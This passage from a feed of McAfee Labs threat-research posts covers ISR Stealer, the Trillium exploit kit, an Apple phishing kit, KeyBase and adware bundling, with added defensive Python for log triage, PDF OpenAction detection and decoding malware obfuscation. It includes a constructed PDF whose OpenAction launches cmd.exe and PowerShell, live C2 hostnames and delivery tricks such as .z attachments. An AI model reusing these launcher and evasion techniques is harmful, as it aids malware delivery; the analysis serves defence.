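    '10.0.0.40 - - [09/Mar/2016:10:13:22 +0000] "POST http://another.example/wp-content/p/index.php HTTP/1.1" 200 17 "-" "HardCore Software For : Public."',
    '10.0.0.12 - - [09/Mar/2016:10:14:00 +0000] "GET http://www.example.com/news HTTP/1.1" 200 2048 "-" "HardCore Software For : Public"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for h in find_isr_uploads(SAMPLE_LOG):
        print(f"{h.timestamp} {h.client} {h.method} {h.url}")
    print("panel hosts:", panel_hosts(find_isr_uploads(SAMPLE_LOG)))
```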

The PWS targets the following applications:

  • Internet Explorer
  • Firefox
  • Chrome
  • Opera
  • Safari
  • Yahoo Messenger
  • MSN Messenger
  • Pidgin
  • FileZilla
  • Internet Download Manager
  • JDownloader
  • Trillian

The following screen of the original Hackhound Stealer shows options for building the malware:

This screen of the ISR Stealer builder was used by the actors behind the campaign.

ISR Stealer uses two executables to gather passwords stored on the machine: Mail PassView and WebBrowserPassView, both by Nirsoft. These apps gather passwords stored in mail clients and web browsers. Both of these files reside in the resources of the ISR Stealer. The panel location is also stored in the malware’s resources, in a simple encrypted form with SUB 0x02.

An encrypted URL.

A decrypted URL.

We did some more digging and found that the actors responsible for this malware have been active since the beginning of 2016, with the first sample spotted in the wild in January.

The following spear-phishing emails were sent to entice targets to download and execute the PWS:

The actors have been busy for several weeks, although we saw no activity during the Easter holiday. After “Easter break,” we noticed that they had slightly changed the panel. It now includes the string “Powered By NEW LINE OF *** **U TEAMS VERSION 2.1.”

One compromised website had more than 10 access panels receiving stolen passwords from the PWS. We observed that some of the targets of the spear phishing are companies that deal with machinery parts. The actors used some of the following filenames:

  • (RFQ__1045667machine-oil valves).exe
  • ButterflyCheckVALVES.exe
  • BALL VALVE BIDDING.exe
  • RFQ BALL VALVE.exe
  • Ball Valves with BSPP conection.exe

These names lead us to believe that industrial espionage might be a motive of the actors.

We have also noticed that they are attaching the malware with a “.z” extension. This is likely because some popular ZIP file handlers will associate this file extension with their programs and allow users to extract it. Using .z also bypasses some popular cloud email file restrictions.

We contacted the owners of the websites used by the actors and informed them of the compromise so that they could remove the panels.

Prevention

McAfee detects this threat as PWS-FCGH. We advise you to block the .z file extension at the gateway level. This step will also prevent other malware from using this technique in phishing campaigns.

The post Phishing Attacks Employ Old but Effective Password Stealer appeared first on McAfee Blogs.

Trillium Exploit Kit Update Offers ‘Security Tips’
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/trillium-exploit-kit-update-offers-security-tips/
Thu, 02 Jun 2016 23:27:08 +0000

McAfee Labs has previously blogged about the Trillium Exploit Kit Version 3.0, which is commonly used to create and distribute malware. Last week, Version 4.0 appeared on several underground forums.

We have analyzed the new version of the tool and it contains new functionality. These include:

  • PDF downloader
  • Password generator
  • Security tips

PDF downloader

The user has several options when creating a PDF downloader, though all of these options create very similar PDF files.

Upon opening the file with our FileInsight tool, we can clearly see the PDF using the OpenAction function to invoke PowerShell, which will download and execute a file.
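The OpenAction hook is something a defender can check for statically. The following Python is an added example, not part of the original post and not McAfee's FileInsight or the toolkit's code: it resolves a PDF's /OpenAction and reports a Launch or JavaScript action that mentions a shell interpreter, run against two constructed minimal PDFs.

```python
"""Static triage of a PDF's /OpenAction, the hook the post shows Trillium 4.0
using to invoke PowerShell when the document is opened.

Added example, not McAfee's FileInsight or the toolkit's code. It finds the
catalog's /OpenAction (a direct dictionary or an indirect "n 0 R" reference),
reads the action type and flags a Launch or JavaScript action whose content
mentions a shell interpreter. Both PDFs below are constructed for the
demonstration. Real samples often place the same objects in compressed
object streams or hex-encoded strings, which this plain-text scan does not
decode, so treat a negative result as "nothing visible", not "clean".
"""
import re

OBJ_RE = re.compile(rb"(?P<num>\d+)\s+0\s+obj(?P<body>.*?)endobj", re.S)
SHELL_WORDS = (b"powershell", b"cmd.exe", b"wscript", b"cscript", b"mshta")


def objects(pdf: bytes) -> dict:
    """Map object number -> raw body for every 'n 0 obj ... endobj' in the file."""
    return {int(m.group("num")): m.group("body") for m in OBJ_RE.finditer(pdf)}


def balanced_dict(data: bytes, start: int) -> bytes:
    """Return the dictionary beginning at data[start] ('<<'), honouring nesting
    such as /Win << ... >> inside a Launch action."""
    depth, i = 0, start
    while i < len(data) - 1:
        pair = data[i:i + 2]
        if pair == b"<<":
            depth += 1
            i += 2
        elif pair == b">>":
            depth -= 1
            i += 2
            if depth == 0:
                return data[start:i]
        else:
            i += 1
    raise ValueError("unbalanced dictionary")


def open_action(pdf: bytes):
    """Bytes of the OpenAction dictionary, or None if the PDF has none."""
    m = re.search(rb"/OpenAction\s*", pdf)
    if not m:
        return None
    rest = pdf[m.end():]
    if rest.startswith(b"<<"):
        return balanced_dict(pdf, m.end())
    ref = re.match(rb"(\d+)\s+0\s+R", rest)
    return objects(pdf).get(int(ref.group(1))) if ref else None


def classify_open_action(pdf: bytes) -> dict:
    """Summarise what the document does on open."""
    action = open_action(pdf)
    if action is None:
        return {"has_open_action": False, "action_type": None, "launches_shell": False}
    type_match = re.search(rb"/S\s*/(\w+)", action)
    action_type = type_match.group(1).decode() if type_match else None
    low = action.lower()
    launches_shell = action_type in ("Launch", "JavaScript") and any(w in low for w in SHELL_WORDS)
    return {"has_open_action": True, "action_type": action_type, "launches_shell": launches_shell}


# Constructed: the shape the post describes (OpenAction -> Launch -> PowerShell);
# the command line is a placeholder, not a real downloader.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
3 0 obj
<< /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c powershell -NoProfile PLACEHOLDER_ARGS) >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# Constructed: a benign OpenAction that only jumps to a page.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction << /Type /Action /S /GoTo /D [2 0 R /Fit] >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    print(classify_open_action(SAMPLE_PDF))
    print(classify_open_action(BENIGN_PDF))
```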

Password generator

A strange addition to the toolkit is a password-generating component.

This will create a randomly generated string to be used as a password for any account. Users can save this password on their machines. Upon clicking the button, a text file is created that contains a clear-text unencrypted copy of the password.

This is not very secure.

Security tips

The oddest addition to Trillium is the inclusion of several security tips to help users avoid malware infections. We find this ironic because the purpose of the software is to breach the security of user environments.

There are various tips on antiphishing, downloading, uninstalling vulnerable software, and password use.

In use

We have seen this toolkit used in the wild to target a bank in the Asia-Pacific region. The email we observed contains a malicious PowerPoint file.

The attachment is a .PPSX file, a PowerPoint Show file that starts the app in slideshow mode. This trick has been used many times to mask what is happening in the background.

The .PPSX file contains an embedded VBS.Downloader Trojan created using the Trillium 4.0 toolkit. A feature in PowerPoint can execute embedded OLE objects; the attacker has taken advantage of this by creating a custom action to execute the embedded VBS.Downloader when the PowerPoint slide is opened. (Click here for more information on the custom animation feature.)

Custom animation feature used to execute the embedded VBS file.

VBS.Downloader Trojan created by Trillium 4.0.

The VBS file downloads a password-stealing Trojan that targets the following software:

  • Firefox
  • Thunderbird
  • SeaMonkey
  • Opera
  • Outlook
  • Pidgin

The password stealer has keylogging functionality and will create a log file in the %APPDATA%\LOGS folder in the format DD-MM-YYYY. The malware encrypts these log files with XOR 0x9D and then adds 0x24. To decrypt them, we reverse this algorithm: subtract 0x24 and then XOR the result with 0x9D.

Encrypted log file.

Decrypted log file.
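The log decryption above, and the SUB 0x02 panel-URL encoding from the “Phishing Attacks Employ Old but Effective Password Stealer” post earlier on this page, are both single-byte transforms that an analyst reverses the same way. The following Python is an added example (not McAfee's code and not the malware's): it implements both decoders and, going one step beyond the post, recovers the XOR/ADD constants from a known-plaintext prefix. The keylog line is constructed, and the SUB 0x02 direction (subtract at build time, add back to recover) is an assumption since the post gives only “SUB 0x02”.

```python
"""Decoders for the two byte-level obfuscation schemes described on this page.

Added example, not McAfee's code or the malware's. The Trillium-built password
stealer encrypts its keylog files with XOR 0x9D followed by ADD 0x24 (this
post); ISR Stealer stores its panel URL with SUB 0x02 (the "Phishing Attacks
Employ Old but Effective Password Stealer" post). The post gives only
"SUB 0x02", so the direction (subtract at build time, add back to recover) is
an assumption. All sample data is constructed here.
"""
from itertools import product

TRILLIUM_XOR = 0x9D
TRILLIUM_ADD = 0x24
ISR_SUB = 0x02


def trillium_encrypt(plain: bytes) -> bytes:
    """Forward transform used on the log files: XOR 0x9D, then ADD 0x24 (mod 256)."""
    return bytes(((b ^ TRILLIUM_XOR) + TRILLIUM_ADD) & 0xFF for b in plain)


def trillium_decrypt(cipher: bytes) -> bytes:
    """Inverse: subtract 0x24 (mod 256, so bytes that wrapped on encryption
    unwrap correctly), then XOR 0x9D."""
    return bytes(((b - TRILLIUM_ADD) & 0xFF) ^ TRILLIUM_XOR for b in cipher)


def isr_encode_url(url: bytes) -> bytes:
    """SUB 0x02 per byte (assumed build-time direction)."""
    return bytes((b - ISR_SUB) & 0xFF for b in url)


def isr_decode_url(stored: bytes) -> bytes:
    """Add 0x02 back to each byte of the resource blob to recover the panel URL."""
    return bytes((b + ISR_SUB) & 0xFF for b in stored)


def recover_xor_add(cipher: bytes, known_prefix: bytes):
    """Recover the (xor, add) constants of any 'XOR k1 then ADD k2' scheme from a
    known-plaintext prefix by trying all 65,536 pairs; returns every pair that
    fits. (k1, k2) and (k1 ^ 0x80, (k2 + 0x80) & 0xFF) are the same transform
    (flipping the top bit equals adding 128 mod 256), so expect two equivalent
    answers even with a long, varied prefix."""
    window = cipher[:len(known_prefix)]
    hits = []
    for k_xor, k_add in product(range(256), repeat=2):
        if bytes(((b - k_add) & 0xFF) ^ k_xor for b in window) == known_prefix:
            hits.append((k_xor, k_add))
    return hits


# Constructed keylog line (the real log layout is not documented in the post).
SAMPLE_PLAIN = b"[01-06-2016 10:15:22] notepad.exe: hello world\r\n"
SAMPLE_CIPHER = trillium_encrypt(SAMPLE_PLAIN)

if __name__ == "__main__":
    print(trillium_decrypt(SAMPLE_CIPHER))
    print([(hex(x), hex(a)) for x, a in recover_xor_add(SAMPLE_CIPHER, b"[01-06-2016")])
    print(isr_decode_url(isr_encode_url(b"http://panel.example/index.php")))
```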

The malware attempts to contact the following servers:

  • adzone.duia.eu
  • adzone.ddns.net
  • adzone.zzzz.io

McAfee has the following signatures for the Trillium malware:

  • W97M/Downloader.bdu
  • Trojan-FISA
  • Downloader-FBEF

We recommend that our customers read this post on best practices. The advice should help mitigate some of the infections seen by malware created by this toolkit.

The post Trillium Exploit Kit Update Offers ‘Security Tips’ appeared first on McAfee Blogs.

Hacktivists Turn to Phishing to Fund Their Causes
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/hacktivists-turn-phishing-fund-causes/
Wed, 16 Mar 2016 23:33:34 +0000

At McAfee we recently observed a phishing campaign targeting Apple account holders.

The link directed the user to a compromised WordPress site used to serve the fake Apple ID login page.

Users are asked to log in with their Apple IDs, and then are requested to update billing information and credit card details. In the following images we have highlighted some indicators that the site is not legitimate.

Users are then redirected to the official Apple page.

The phishers usually create a local .zip file that contains all of their scripts to create the phishing page. They upload this file to a compromised server, extract it, and delete the file. On this occasion, the phisher appears to have forgotten to perform this last step.

This oversight enabled us to see how the website code worked; we found some interesting comments.

The .zip file contained a readme that states the results would be stored locally, although this was not the case.

We also found some .htaccess files. These are used to block access to the site by checking the originating IP of the connection. This is done to prevent the site from being accessed and analyzed by robot scrapers.

Depending on the page a user lands on—credit card, Apple login, or address change—a .php script generates an email and sends it to bayremking0@gmail.com.

In one of the .php files we found a reference to a hacktivist group. We did some investigating and found this name had been associated with several website defacings. The group’s activities promote a set of political views, so we suspect that the group was funding its operations through this new phishing scam.

We received another phishing email that was identical to the original one apart from the URL it linked to. It served the same fake Apple page but this time it did not contain the .zip file. We went to the homepage of the compromised site and found it had also been defaced.

This confirmed our view that the original phishing site was hacked by the hacktivist group. It seems that political hackers are now using their skills to generate income to aid their causes.

McAfee customers are protected from this campaign through heuristic definitions and McAfee Global Threat Intelligence reputation.

The post Hacktivists Turn to Phishing to Fund Their Causes appeared first on McAfee Blogs.

Trillium Toolkit Leads to Widespread Malware
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/trillium-toolkit-leads-widespread-malware/
Fri, 04 Mar 2016 22:42:17 +0000

Any aspiring cybercriminal can buy one of many malicious toolkits to craft a downloader and distribute malware. After a time these downloaders are leaked to forums and other download sites and become available to the masses. This is often when we see a spike in their use.

The toolkit Trillium Security MultiSploit Tool v3 was cracked last week and uploaded onto several malicious forums.

Trillium was created by a coder using the same name. The program contains an EULA that mentions it should not be used maliciously, but we are well aware that these types of kits are used for generating malware.

In order to use the builder, the user needs to acknowledge the EULA by clicking on a button. So we guess everyone who is using it is violating the policy.

Whenever you use the tool to create an exploit or a downloader you are reminded yet again not to use it maliciously.

Version 1 of this tool appeared for sale at the end of last year for US$300 on a popular hacking forum. Since then, it has been updated to Version 3.

This toolkit allows the user to create several types of downloaders. It breaks them down into three options:

  • Windows shortcut exploits
  • Silent exploit
  • Macro exploits

Windows shortcut exploits rename an executable to a specified filename and create a LNK file that uses PowerShell to execute it.

This type offers the option to use different icons and file extensions, all to trick the target into executing the LNK file.

A silent exploit creates a file that downloads and executes a specified file from the Internet. The users have the option to create the following file types:

*.chm,*.wsf, *.vbs, *.hta, *.htm, *.html, *.bat, *.cmd, *.ps1, *.psc1, *.exe, *.pif, *.scr, *.com, *.url, *.lnk

Depending on the chosen options, the toolkit will create one of the following files:

  • A PowerShell script
  • A Visual Basic executable
  • A Visual Basic script

The PowerShell script, executed as hidden, downloads and runs a file.

The Visual Basic executable downloads and executes a file.

The Visual Basic script again downloads and executes a file.

Macro exploits allow users to create a macro that will download and execute a file. This type of attack is very common today; we have seen it used to spread Dridex and other ransomware families. The tool can create several macro versions, for example:

We have already observed this toolkit being used to distribute malware. We have seen spam campaigns using the macro exploit component, for example:

Detection
McAfee has several drivers that detect the files created by this toolkit. Detection is included in DAT Versions 8094 and later.

  • Trojan-FHYT
  • Trojan-FHYU
  • W97M/Downloader.azi
  • W97M/Downloader.azj
  • W97M/Downloader.azk

We also recommend our customers read this blog containing preventive measures against Dridex. The advice should help mitigate some of the infections seen by malware created by this toolkit.

The post Trillium Toolkit Leads to Widespread Malware appeared first on McAfee Blogs.

Malicious Forums Turn Amateur Hackers Into Cybercriminals
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malicious-forums-turn-amateur-hackers-into-cybercriminals/
Thu, 25 Feb 2016 19:18:22 +0000

Security researchers are aware of forums that offer downloads of malicious software such as keyloggers and remote access tools. Some inexperienced hackers may visit these forums and decide to chase the money and create a malicious agenda.

The following is a snippet from a popular hacking forum.

We recently received a submission with the filename 17_02_16~_HKL_Purchase_Order.ace. This file contained another file with a .scr (screen saver) extension. The extracted file was a keylogger/password stealer known as KeyBase.

KeyBase comes in a kit:

The KeyBase kit offers various configuration options. The password option allows the user to steal passwords from various mail clients/browsers and other popular applications. These kits make it very easy for anyone with little to no skill to create malicious programs.

We replicated the sample and navigated to the control server:

We noticed that it had a very specific welcome message, so we decided to do some searching.

We found the username shown on the control server had been registered on several malicious forums. Upon further investigation we found this actor had downloaded several malicious kits and probably got the builder for KeyBase from one of these sites. The activity on some sites dated to 2013.

We next tried to find out if this actor was involved in any past malicious activities. We looked at how the actor tried to spread the malware and whether the filename of the .ace file was unique. We found only one other instance of a similar filename.

The file we found dated back to January. Upon analyzing the file, we found it to be the keylogger HawkEye. This keylogger is very easy to find on these malicious sites.

Here is a screen shot of Version 3 of the malicious builder:

We dived deeper and found the email address associated with the hacking forum accounts. We found five domains that were registered using this email address:

As we wrote this post, all of these domains were down. However, it is more than likely that these domains were or will be used for malicious purposes.

We found a username associated with the email address on the popular file-sharing website 4shared.

This user had uploaded 12 files, including a text file with nearly a half-million email addresses. This would have no doubt been used as part of a spam campaign to spread the malware.

With all the information that we have collected, we can see that malicious forums make it easy for someone with little skill to create malware. An experienced actor would work in a much more covert way. However, both types can be dangerous.

McAfee detects this keylogger threat as Trojan-FHWM since DAT Version 8079.

The post Malicious Forums Turn Amateur Hackers Into Cybercriminals appeared first on McAfee Blogs.

File-Hosting Site Turns Your File Into Adware
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/file-hosting-site-turns-file-adware/
Thu, 28 Jan 2016 21:13:22 +0000

We recently received a sample from a customer and upon initial analysis it looked like a bundled software installer. Upon execution, the installer launches a website and then attempts to download an executable—an installer for FLV Player. Nothing out of the ordinary, but what grabbed our attention was the website that had loaded after execution. It appeared to be a “Thanks for installing” page but the domain name looked odd.

We navigated to the top level of this site and found several subsites.

Clicking through these, we found all of them to be fake pages that show users an advertisement to entice them to install another piece of software. This tactic is common with installers for potentially unwanted programs (PUPs), but it is uncommon for one website to have several fake pages.

The common thread is that they all show ads from castplatform.com. A copy of the script used on these pages follows:

Some of the pages we found were fake landing pages for common applications including:

  • VLC Player
  • CamStudio
  • FreeRideGames
  • FileHippoMineCraft Projects
  • Brothersoft

We decided to dive deeper and try to find the source of this installer.

This is usually the tricky part when dealing with PUPs due to the different techniques used by the authors. Most PUPs include no company or owner information, no homepage, come only in bundles, and require certain switches for the installer to work.

Our first step was to see if we could find other files that connected to these fake landing pages. We soon discovered thousands of these; they all showed similar behavior.

Once we gathered all the samples we knew our best shot was to get a list of all the domains that were contacted. The logic behind this was to look at the list and see if there was a common domain that appeared more frequently than others. It was likely this domain hosted the files.

We found a few common websites that the installers contacted, so we began to go through them. A couple stood out; these were file upload sites. We assumed these file upload sites bundled the uploaded files with a new installer.

The two sites that gained most of our attention were File-space.org and 100lm.ru. File-space.org made it clear that it was about monetizing.

Here is a snippet from the FAQ page:

Here is how much its users can make:

It works out between £8 and £16 per one thousand downloads.

From reading the FAQ, we seemed to be on the right track. So we signed up to the website and uploaded a file. We then downloaded the uploaded file and found that it was indeed bundled with other applications. However, the behavior was not the same as our customer’s file. So our search continued for the source of our sample.

Our attention now went to 100lm.ru. This website had no detailed FAQ/EULA/Tariff page and no mention of monetization.

What we instantly noticed was a catalog page.

Any file that anyone uploads to the site appears on this list. This means that anyone can download files anyone else uploads, even those rated “not so secure.” Regardless, we came here to find the source of our PUP installer.

We chose one file to download. As you can see from the following image, this file had been downloaded more than one thousand times.

We replicated the file and found the behavior to be exactly the same as our initial sample.

So we downloaded a couple more of these files and we hit the jackpot. Every one we chose loaded the fake landing page. We checked the digital signature of the files and they all matched the one in the file we originally received.

Just to double-check, we uploaded our own file and downloaded it. The downloaded file was bundled with other software that loaded the fake landing page when executed.

What is different between the two upload sites is that 100lm.ru does not inform users that it is bundling; thus that site makes all the pay-per-install (PPI) revenue. This is extremely misleading. Even if a fake landing page was not loaded, this behavior would still warrant PUP detection.

Here is a flow of how this PUP spreads:

Our findings show that you have to be very careful when choosing a file-hosting website. We recommend that you use the most popular ones and do a simple check to see if the file you upload is the same as the one that you download.

A simple way to do this is to use the command-line tool FC.exe, which is available on every Windows system. It compares two files and will highlight any differences.

Usage: FC.exe “file1” “file2”

Malicious domains:

Detection for the malicious installer has been added as Adware-FakeLand and is covered in DAT Version 8055.

The post File-Hosting Site Turns Your File Into Adware appeared first on McAfee Blogs.
